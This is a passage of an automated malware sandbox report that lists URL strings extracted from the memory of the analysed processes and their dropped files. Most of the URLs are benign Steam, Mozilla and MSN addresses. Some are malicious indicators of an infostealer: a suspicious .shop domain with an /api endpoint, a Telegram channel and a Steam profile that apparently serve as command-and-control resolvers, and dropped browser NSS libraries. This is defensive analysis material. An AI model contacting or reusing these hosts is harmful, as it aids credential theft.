Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v
Source: katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, HIJJEG.12.dr	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, HIJJEG.12.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: 5876.exe, 00000007.00000003.1743881764.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2236009021.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, GHDBAF.12.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 5876.exe, 00000007.00000003.1743881764.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2236009021.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, GHDBAF.12.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 5876.exe, 00000007.00000003.1743881764.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2236009021.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, GHDBAF.12.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 00000002.00000000.1406666637.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://help.steampowered.com/en/
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1b2aMG.img
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYTL1i.img
Source: HIJJEG.12.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: explorer.exe, 00000002.00000000.1406666637.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://java.co
Source: katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: https://mozilla.org0/
Source: explorer.exe, 00000002.00000000.1406666637.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: explorer.exe, 00000002.00000000.1406666637.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comer
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 76561199689717899[1].htm.12.dr	String found in binary or memory: https://steamcommunity.com/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://steamcommunity.com/discussions/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?go
Source: 76561199689717899[1].htm.12.dr	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199689717899
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://steamcommunity.com/market/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wish
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: EE6.exe, 0000000B.00000002.2056487759.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, EE6.exe, 0000000B.00000002.2056395871.0000000004470000.00000040.00001000.00020000.00000000.sdmp, EE6.exe, 0000000B.00000002.2056003216.0000000004170000.00000040.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2532896243.0000000000422000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.000000000096E000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000983000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000972000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000983000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000929000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000983000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/badges
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/inventory/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000422000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899r0isMozilla/5.0
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://steamcommunity.com/workshop/
Source: 76561199689717899[1].htm.12.dr	String found in binary or memory: https://store.steampowered.com/
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: 76561199689717899[1].htm.12.dr	String found in binary or memory: https://store.steampowered.com/about/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://store.steampowered.com/explore/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://store.steampowered.com/legal/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://store.steampowered.com/mobile
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://store.steampowered.com/news/
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://store.steampowered.com/stats/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: JKEBFB.12.dr	String found in binary or memory: https://support.mozilla.org
Source: JKEBFB.12.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 5876.exe, 00000007.00000003.1774602744.0000000002D9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: JKEBFB.12.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
Source: EE6.exe, 0000000B.00000002.2056487759.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, EE6.exe, 0000000B.00000002.2056395871.0000000004470000.00000040.00001000.00020000.00000000.sdmp, EE6.exe, 0000000B.00000002.2056003216.0000000004170000.00000040.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2532896243.0000000000422000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/copterwin
Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000422000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/copterwinr0isMozilla/5.0
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
Source: 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000002.2152415430.00000000007C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://whispedwoodmoodsksl.shop/
Source: 5876.exe, 00000007.00000003.1742482875.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1742584345.0000000000818000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://whispedwoodmoodsksl.shop/D
Source: 5876.exe, 00000007.00000002.2152415430.00000000007C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://whispedwoodmoodsksl.shop/H
Source: 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1742584345.0000000000818000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://whispedwoodmoodsksl.shop/api
Source: 5876.exe, 00000007.00000003.1760169194.0000000000862000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1746306050.0000000000862000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://whispedwoodmoodsksl.shop/apiF
Source: 5876.exe, 00000007.00000002.2152415430.00000000007C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://whispedwoodmoodsksl.shop/n
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000002.00000000.1406666637.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/EM0
Source: explorer.exe, 00000002.00000000.1406666637.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com48
Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, HIJJEG.12.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: 5876.exe, 00000007.00000003.1743881764.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2236009021.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, GHDBAF.12.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: 5876.exe, 00000007.00000003.1743881764.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2236009021.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, GHDBAF.12.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, HIJJEG.12.dr	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: JKEBFB.12.dr	String found in binary or memory: https://www.mozilla.org
Source: JKEBFB.12.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: JKEBFB.12.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: JKEBFB.12.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: 5876.exe, 00000007.00000003.1774602744.0000000002D9B000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2398671914.000000001E434000.00000004.00000020.00020000.00000000.sdmp, JKEBFB.12.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
